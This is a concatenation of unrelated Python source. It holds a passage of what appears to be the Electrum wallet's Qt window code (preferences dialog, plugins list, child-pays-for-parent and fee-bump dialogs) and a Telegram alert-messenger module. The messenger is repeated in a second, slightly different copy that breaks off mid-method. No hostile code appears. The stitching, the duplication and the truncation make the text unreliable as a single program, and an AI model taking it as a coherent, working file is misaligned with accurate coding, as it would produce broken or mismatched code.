self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum.i18n import languages lang_combo.addItems(list(languages.values())) lang_keys = list(languages.keys()) lang_cur_setting = self.config.get("language", '') try: index = lang_keys.index(lang_cur_setting) except ValueError: # not in list index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." 
will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) msg = '\n'.join([ _('Time based: fee rate is based on average confirmation time estimates'), _('Mempool based: fee rate is targeting a depth in the memory pool') ] ) fee_type_label = HelpLabel(_('Fee estimation') + ':', msg) fee_type_combo = QComboBox() fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')]) fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0) def on_fee_type(x): self.config.set_key('mempool_fees', x==2) self.config.set_key('dynamic_fees', x>0) self.fee_slider.update() fee_type_combo.currentIndexChanged.connect(on_fee_type) fee_widgets.append((fee_type_label, fee_type_combo)) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_adv_controls.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) use_rbf = self.config.get('use_rbf', True) use_rbf_cb = QCheckBox(_('Use Replace-By-Fee')) use_rbf_cb.setChecked(use_rbf) use_rbf_cb.setToolTip( _('If you check this box, your transactions will be marked as non-final,') + '\n' + \ _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \ _('Note that some merchants do not accept non-final transactions until they are confirmed.')) def on_use_rbf(x): self.config.set_key('use_rbf', bool(x)) batch_rbf_cb.setEnabled(bool(x)) use_rbf_cb.stateChanged.connect(on_use_rbf) fee_widgets.append((use_rbf_cb, None)) batch_rbf_cb = QCheckBox(_('Batch RBF transactions')) batch_rbf_cb.setChecked(self.config.get('batch_rbf', False)) batch_rbf_cb.setEnabled(use_rbf) batch_rbf_cb.setToolTip( _('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \ _('This will save fees.')) def on_batch_rbf(x): self.config.set_key('batch_rbf', bool(x)) batch_rbf_cb.stateChanged.connect(on_batch_rbf) fee_widgets.append((batch_rbf_cb, None)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see https://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() 
self.alias_received_signal.connect(set_alias_color) alias_e.editingFinished.connect(on_alias_edit) id_widgets.append((alias_label, alias_e)) # SSL certificate msg = ' '.join([ _('SSL certificate used to sign payment requests.'), _('Use setconfig to set ssl_chain and ssl_privkey.'), ]) if self.config.get('ssl_privkey') or self.config.get('ssl_chain'): try: SSL_identity = paymentrequest.check_ssl_config(self.config) SSL_error = None except BaseException as e: SSL_identity = "error" SSL_error = str(e) else: SSL_identity = "" SSL_error = None SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg) SSL_id_e = QLineEdit(SSL_identity) SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '') if SSL_error: SSL_id_e.setToolTip(SSL_error) SSL_id_e.setReadOnly(True) id_widgets.append((SSL_id_label, SSL_id_e)) units = base_units_list msg = (_('Base unit of your wallet.') + '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n' + _('This setting affects the Send tab, and all balance related fields.')) unit_label = HelpLabel(_('Base unit') + ':', msg) unit_combo = QComboBox() unit_combo.addItems(units) unit_combo.setCurrentIndex(units.index(self.base_unit())) def on_unit(x, nz): unit_result = units[unit_combo.currentIndex()] if self.base_unit() == unit_result: return edits = self.amount_e, self.fee_e, self.receive_amount_e amounts = [edit.get_amount() for edit in edits] self.decimal_point = base_unit_name_to_decimal_point(unit_result) self.config.set_key('decimal_point', self.decimal_point, True) nz.setMaximum(self.decimal_point) self.history_list.update() self.request_list.update() self.address_list.update() for edit, amount in zip(edits, amounts): edit.setAmount(amount) self.update_status() unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz)) gui_widgets.append((unit_label, unit_combo)) block_explorers = sorted(util.block_explorer_info().keys()) msg = _('Choose which online block explorer to use for functions that open a web browser') block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg) block_ex_combo = QComboBox() block_ex_combo.addItems(block_explorers) block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config))) def on_be(x): be_result = block_explorers[block_ex_combo.currentIndex()] self.config.set_key('block_explorer', be_result, True) block_ex_combo.currentIndexChanged.connect(on_be) gui_widgets.append((block_ex_label, block_ex_combo)) from electrum import qrscanner system_cameras = qrscanner._find_system_cameras() qr_combo = QComboBox() qr_combo.addItem("Default","default") for camera, device in system_cameras.items(): qr_combo.addItem(camera, device) #combo.addItem("Manually specify a device", config.get("video_device")) index = qr_combo.findData(self.config.get("video_device")) qr_combo.setCurrentIndex(index) msg = _("Install the zbar package to enable this.") qr_label = HelpLabel(_('Video Device') + ':', msg) qr_combo.setEnabled(qrscanner.libzbar is not None) on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True) qr_combo.currentIndexChanged.connect(on_video_device) gui_widgets.append((qr_label, qr_combo)) colortheme_combo = QComboBox() colortheme_combo.addItem(_('Light'), 'default') colortheme_combo.addItem(_('Dark'), 'dark') index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default')) colortheme_combo.setCurrentIndex(index) colortheme_label = QLabel(_('Color theme') + ':') def on_colortheme(x): 
            self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
            self.need_restart = True
        colortheme_combo.currentIndexChanged.connect(on_colortheme)
        gui_widgets.append((colortheme_label, colortheme_combo))

        updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
        updatecheck_cb.setChecked(self.config.get('check_updates', False))
        def on_set_updatecheck(v):
            self.config.set_key('check_updates', v == Qt.Checked, save=True)
        updatecheck_cb.stateChanged.connect(on_set_updatecheck)
        gui_widgets.append((updatecheck_cb, None))

        filelogging_cb = QCheckBox(_("Write logs to file"))
        filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
        def on_set_filelogging(v):
            self.config.set_key('log_to_file', v == Qt.Checked, save=True)
            self.need_restart = True
        filelogging_cb.stateChanged.connect(on_set_filelogging)
        filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
        gui_widgets.append((filelogging_cb, None))

        usechange_cb = QCheckBox(_('Use change addresses'))
        usechange_cb.setChecked(self.wallet.use_change)
        if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
        def on_usechange(x):
            usechange_result = x == Qt.Checked
            if self.wallet.use_change != usechange_result:
                self.wallet.use_change = usechange_result
                self.wallet.storage.put('use_change', self.wallet.use_change)
                multiple_cb.setEnabled(self.wallet.use_change)
        usechange_cb.stateChanged.connect(on_usechange)
        usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
        tx_widgets.append((usechange_cb, None))

        def on_multiple(x):
            multiple = x == Qt.Checked
            if self.wallet.multiple_change != multiple:
                self.wallet.multiple_change = multiple
                self.wallet.storage.put('multiple_change', multiple)
        multiple_change = self.wallet.multiple_change
        multiple_cb = QCheckBox(_('Use multiple change addresses'))
        multiple_cb.setEnabled(self.wallet.use_change)
        multiple_cb.setToolTip('\n'.join([
            _('In some cases, use up to 3 change addresses in order to break '
              'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
            ]))
        multiple_cb.setChecked(multiple_change)
        multiple_cb.stateChanged.connect(on_multiple)
        tx_widgets.append((multiple_cb, None))

        def fmt_docs(key, klass):
            lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
            return '\n'.join([key, "", " ".join(lines)])

        choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
        if len(choosers) > 1:
            chooser_name = coinchooser.get_name(self.config)
            msg = _('Choose coin (UTXO) selection method. 
The following are available:\n\n') msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items()) chooser_label = HelpLabel(_('Coin selection') + ':', msg) chooser_combo = QComboBox() chooser_combo.addItems(choosers) i = choosers.index(chooser_name) if chooser_name in choosers else 0 chooser_combo.setCurrentIndex(i) def on_chooser(x): chooser_name = choosers[chooser_combo.currentIndex()] self.config.set_key('coin_chooser', chooser_name) chooser_combo.currentIndexChanged.connect(on_chooser) tx_widgets.append((chooser_label, chooser_combo)) def on_unconf(x): self.config.set_key('confirmed_only', bool(x)) conf_only = self.config.get('confirmed_only', False) unconf_cb = QCheckBox(_('Spend only confirmed coins')) unconf_cb.setToolTip(_('Spend only confirmed inputs.')) unconf_cb.setChecked(conf_only) unconf_cb.stateChanged.connect(on_unconf) tx_widgets.append((unconf_cb, None)) def on_outrounding(x): self.config.set_key('coin_chooser_output_rounding', bool(x)) enable_outrounding = self.config.get('coin_chooser_output_rounding', False) outrounding_cb = QCheckBox(_('Enable output value rounding')) outrounding_cb.setToolTip( _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' + _('This might improve your privacy somewhat.') + '\n' + _('If enabled, at most 100 satoshis might be lost due to this, per transaction.')) outrounding_cb.setChecked(enable_outrounding) outrounding_cb.stateChanged.connect(on_outrounding) tx_widgets.append((outrounding_cb, None)) # Fiat Currency hist_checkbox = QCheckBox() hist_capgains_checkbox = QCheckBox() fiat_address_checkbox = QCheckBox() ccy_combo = QComboBox() ex_combo = QComboBox() def update_currencies(): if not self.fx: return currencies = sorted(self.fx.get_currencies(self.fx.get_history_config())) ccy_combo.clear() ccy_combo.addItems([_('None')] + currencies) if self.fx.is_enabled(): ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency())) def update_history_cb(): if not self.fx: return hist_checkbox.setChecked(self.fx.get_history_config()) hist_checkbox.setEnabled(self.fx.is_enabled()) def update_fiat_address_cb(): if not self.fx: return fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config()) def update_history_capgains_cb(): if not self.fx: return hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config()) hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked()) def update_exchanges(): if not self.fx: return b = self.fx.is_enabled() ex_combo.setEnabled(b) if b: h = self.fx.get_history_config() c = self.fx.get_currency() exchanges = self.fx.get_exchanges_by_ccy(c, h) else: exchanges = self.fx.get_exchanges_by_ccy('USD', False) ex_combo.blockSignals(True) ex_combo.clear() ex_combo.addItems(sorted(exchanges)) ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange())) ex_combo.blockSignals(False) def on_currency(hh): if not self.fx: return b = bool(ccy_combo.currentIndex()) ccy = str(ccy_combo.currentText()) if b else None self.fx.set_enabled(b) if b and ccy != self.fx.ccy: self.fx.set_currency(ccy) update_history_cb() update_exchanges() self.update_fiat() def on_exchange(idx): exchange = str(ex_combo.currentText()) if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name(): self.fx.set_exchange(exchange) def on_history(checked): if not self.fx: return self.fx.set_history_config(checked) update_exchanges() self.history_model.refresh('on_history') if self.fx.is_enabled() and checked: self.fx.trigger_update() 
update_history_capgains_cb() def on_history_capgains(checked): if not self.fx: return self.fx.set_history_capital_gains_config(checked) self.history_model.refresh('on_history_capgains') def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_history_capgains_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) hist_capgains_checkbox.stateChanged.connect(on_history_capgains) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('General')), (fiat_widgets, _('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.trigger_update() self.alias_received_signal.disconnect(set_alias_color) run_hook('close_settings_dialog') if self.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.network.unregister_callback(self.on_quotes) self.network.unregister_callback(self.on_history) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.config.set_key("console-history", self.console.history[-50:], True) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', 
                 self.gui_object)

        for i, descr in enumerate(plugins.descriptions.values()):
            full_name = descr['__name__']
            prefix, _separator, name = full_name.rpartition('.')
            p = plugins.get(name)
            if descr.get('registers_keystore'):
                continue
            try:
                cb = QCheckBox(descr['fullname'])
                plugin_is_loaded = p is not None
                cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                              or plugin_is_loaded and p.can_user_disable())
                cb.setEnabled(cb_enabled)
                cb.setChecked(plugin_is_loaded and p.is_enabled())
                grid.addWidget(cb, i, 0)
                enable_settings_widget(p, name, i)
                cb.clicked.connect(partial(do_toggle, cb, name, i))
                msg = descr['description']
                if descr.get('requires'):
                    msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
                grid.addWidget(HelpButton(msg), i, 2)
            except Exception:
                self.logger.exception(f"cannot display plugin {name}")
        grid.setRowStretch(len(plugins.descriptions.values()), 1)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.exec_()

    def cpfp(self, parent_tx, new_tx):
        total_size = parent_tx.estimated_size() + new_tx.estimated_size()
        parent_fee = self.wallet.get_tx_fee(parent_tx)
        if parent_fee is None:
            self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
            return
        d = WindowModalDialog(self, _('Child Pays for Parent'))
        vbox = QVBoxLayout(d)
        msg = (
            "A CPFP is a transaction that sends an unconfirmed output back to "
            "yourself, with a high fee. The goal is to have miners confirm "
            "the parent transaction in order to get the fee attached to the "
            "child transaction.")
        vbox.addWidget(WWLabel(_(msg)))
        msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
        vbox.addWidget(WWLabel(_(msg2)))
        grid = QGridLayout()
        grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
        grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
        max_fee = new_tx.output_value()
        grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
        grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
        output_amount = QLabel('')
        grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
        grid.addWidget(output_amount, 2, 1)
        fee_e = BTCAmountEdit(self.get_decimal_point)
        # FIXME with dyn fees, without estimates, there are all kinds of crashes here
        combined_fee = QLabel('')
        combined_feerate = QLabel('')
        def on_fee_edit(x):
            out_amt = max_fee - fee_e.get_amount()
            out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
            output_amount.setText(out_amt_str)
            comb_fee = parent_fee + fee_e.get_amount()
            comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
            combined_fee.setText(comb_fee_str)
            comb_feerate = comb_fee / total_size * 1000
            comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
            combined_feerate.setText(comb_feerate_str)
        fee_e.textChanged.connect(on_fee_edit)
        def get_child_fee_from_total_feerate(fee_per_kb):
            fee = fee_per_kb * total_size / 1000 - parent_fee
            fee = min(max_fee, fee)
            fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
            return fee
        suggested_feerate = self.config.fee_per_kb()
        if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
            return
        fee = get_child_fee_from_total_feerate(suggested_feerate)
        fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
        grid.addWidget(fee_e, 3, 1)
        def on_rate(dyn, pos,
fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) new_tx.set_rbf(True) self.show_transaction(new_tx) def bump_fee_dialog(self, tx): fee = self.wallet.get_tx_fee(tx) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label(tx.txid()) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit())) vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate))) vbox.addWidget(QLabel(_('New Fee rate') + ':')) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) vbox.addWidget(feerate_e) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_slider.deactivate() vbox.addWidget(fee_slider) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config) except CannotBumpFee as e: self.show_error(str(e)) return if is_final: new_tx.set_rbf(False) self.show_transaction(new_tx, tx_label) def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True
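# ---------------------------------------------------------------------------
# A minimal sketch (not Electrum code) isolating the child-fee arithmetic that
# cpfp() above implements in get_child_fee_from_total_feerate(). The function
# name and the example numbers are illustrative assumptions; only the formula
# (target rate over the combined size, minus the parent's fee, clamped to the
# child's input value and to 1 sat/byte) comes from the code above.

def sketch_child_fee(fee_per_kb: int, total_size: int,
                     parent_fee: int, max_fee: int) -> float:
    # Fee the child must pay so that (parent_fee + child_fee) / total_size
    # reaches the target feerate (fee_per_kb in sat/kB, sizes in bytes).
    fee = fee_per_kb * total_size / 1000 - parent_fee
    fee = min(max_fee, fee)     # cannot exceed the value of the swept input
    fee = max(total_size, fee)  # pay at least 1 sat/byte for the combined size
    return fee


if __name__ == '__main__':
    # 250-byte parent that paid 250 sat, 150-byte child, targeting
    # 10,000 sat/kB, with a 50,000 sat input available to the child:
    assert sketch_child_fee(10_000, 400, 250, 50_000) == 3750.0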
from datetime import datetime

from telegram import Bot
import requests
import tenacity
from tenacity import (
    stop_after_attempt,
    wait_exponential,
)
import os

from src.util.audio import convert_to_mp3
from src.util.vars import (
    TELEGRAM_BOT_TOKEN,
    TELEGRAM_ID,
    TELEGRAM_INTERVAL_SECONDS,
    logger
)


class TelegramMessenger:

    def __init__(self):
        self.last_message = None
        self.bot = Bot(os.environ[TELEGRAM_BOT_TOKEN])

    def can_send_message(self, force_send=False):
        if force_send or self.last_message is None:
            logger.info(f"ℹ️ Sending message: force_send={force_send}, "
                        f"last_message_exists={self.last_message is not None}.")
            return True

        # total_seconds() rather than .seconds: .seconds only counts the
        # time-of-day part of the delta and wraps after 24 hours, which would
        # wrongly rate-limit a message sent more than a day after the last one.
        seconds_since_last_message = (datetime.now() - self.last_message).total_seconds()
        logger.info(f"ℹ️ Last message sent {(seconds_since_last_message / 60):.2f} minutes ago.")
        return seconds_since_last_message >= TELEGRAM_INTERVAL_SECONDS

    def set_message_sent(self, force_send=False):
        if not force_send:
            self.last_message = datetime.now()

    @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10))
    def send_text_message(self, message, force_send=False):
        # Pass the query string via params= so requests URL-encodes it;
        # interpolating `message` into the URL breaks on spaces, '&', '#', etc.
        text_url = f"https://api.telegram.org/bot{os.environ[TELEGRAM_BOT_TOKEN]}/sendMessage"
        params = {
            "chat_id": os.environ[TELEGRAM_ID],
            "parse_mode": "Markdown",
            "text": message,
        }
        response = requests.get(text_url, params=params)
        result = response.json()
        logger.info(f"🤖 Bot message sent: {bool(result["ok"])}")

        if response.status_code != 200:
            logger.info(f"❌ send_text_message() failed with status={response.status_code}")

        if bool(result["ok"]):
            self.set_message_sent(force_send)
            return True

        logger.exception(f"❌ Failed to send text message: {response}")
        raise Exception(f"❌ Failed to send text message: {response}")

    @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10))
    def send_audio_message(self, mp3_file_path):
        logger.info(f"🤖 Trying to upload audio in {mp3_file_path}...")
        # Use a context manager so the handle is closed even if the upload
        # fails and tenacity retries.
        with open(mp3_file_path, "rb") as voice_file:
            self.bot.send_voice(
                chat_id=os.environ[TELEGRAM_ID],
                voice=voice_file
            )

    def send_alert(self, message, wav_file_path=None, force_send=False):
        can_send = self.can_send_message(force_send)
        if not can_send:
            logger.info(f"❌ Not sending message: can_send={can_send}; force_send={force_send}.")
            return

        try:
            self.send_text_message(message, force_send)
            if wav_file_path is not None:
                mp3_file_path = convert_to_mp3(wav_file_path)
                if os.path.exists(mp3_file_path):
                    self.send_audio_message(mp3_file_path)
                    logger.info(f"🗑 Removing: {mp3_file_path}")
                    os.remove(mp3_file_path)
        except Exception as e:
            logger.info(f"❌ Failed to send alert: {str(e)}")
            logger.exception(e)
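# ---------------------------------------------------------------------------
# Self-contained demo (not part of the module above) of the retry policy used
# on send_text_message()/send_audio_message(): up to 5 attempts, with an
# exponential wait clamped to the [4, 10] second range (per the tenacity
# docs, roughly 4s, 4s, 8s, 10s between attempts). `flaky_send` is a made-up
# stand-in for the Telegram calls.
import tenacity
from tenacity import stop_after_attempt, wait_exponential

attempts = {"n": 0}

@tenacity.retry(stop=stop_after_attempt(5),
                wait=wait_exponential(multiplier=1, min=4, max=10))
def flaky_send():
    # Fails twice, then succeeds; tenacity re-raises if all 5 attempts fail.
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise RuntimeError("transient network error")
    return "sent"

# Calling flaky_send() here would sleep roughly 8s across the two retries
# before returning "sent".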
from datetime import datetime

from telegram import Bot
import requests
import tenacity
from tenacity import (
    stop_after_attempt,
    wait_exponential,
)
import os

from src.util.audio import convert_to_mp3
from src.util.vars import (
    TELEGRAM_BOT_TOKEN,
    TELEGRAM_ID,
    TELEGRAM_INTERVAL_SECONDS,
    logger
)


class TelegramMessenger:

    def __init__(self):
        self.last_message = None
        self.bot = Bot(os.environ[TELEGRAM_BOT_TOKEN])

    def can_send_message(self, force_send=False):
        if force_send or self.last_message is None:
            logger.info(f"ℹ️ Sending message: force_send={force_send}, "
                        f"last_message_exists={self.last_message is not None}.")
            return True

        # total_seconds() rather than .seconds: .seconds only counts the
        # time-of-day part of the delta and wraps after 24 hours, which would
        # wrongly rate-limit a message sent more than a day after the last one.
        seconds_since_last_message = (datetime.now() - self.last_message).total_seconds()
        logger.info(f"ℹ️ Last message sent {(seconds_since_last_message / 60):.2f} minutes ago.")
        return seconds_since_last_message >= TELEGRAM_INTERVAL_SECONDS

    def set_message_sent(self, force_send=False):
        if not force_send:
            self.last_message = datetime.now()

    @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10))
    def send_text_message(self, message, force_send=False):
        # Pass the query string via params= so requests URL-encodes it;
        # interpolating `message` into the URL breaks on spaces, '&', '#', etc.
        text_url = f"https://api.telegram.org/bot{os.environ[TELEGRAM_BOT_TOKEN]}/sendMessage"
        params = {
            "chat_id": os.environ[TELEGRAM_ID],
            "parse_mode": "Markdown",
            "text": message,
        }
        response = requests.get(text_url, params=params)
        result = response.json()
        logger.info(f"🤖 Bot message sent: {bool(result['ok'])}")

        if response.status_code != 200:
            logger.info(f"❌ send_text_message() failed with status={response.status_code}")

        if bool(result["ok"]):
            self.set_message_sent(force_send)
            return True

        logger.exception(f"❌ Failed to send text message: {response}")
        raise Exception(f"❌ Failed to send text message: {response}")

    @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10))
    def send_audio_message(self, mp3_file_path):
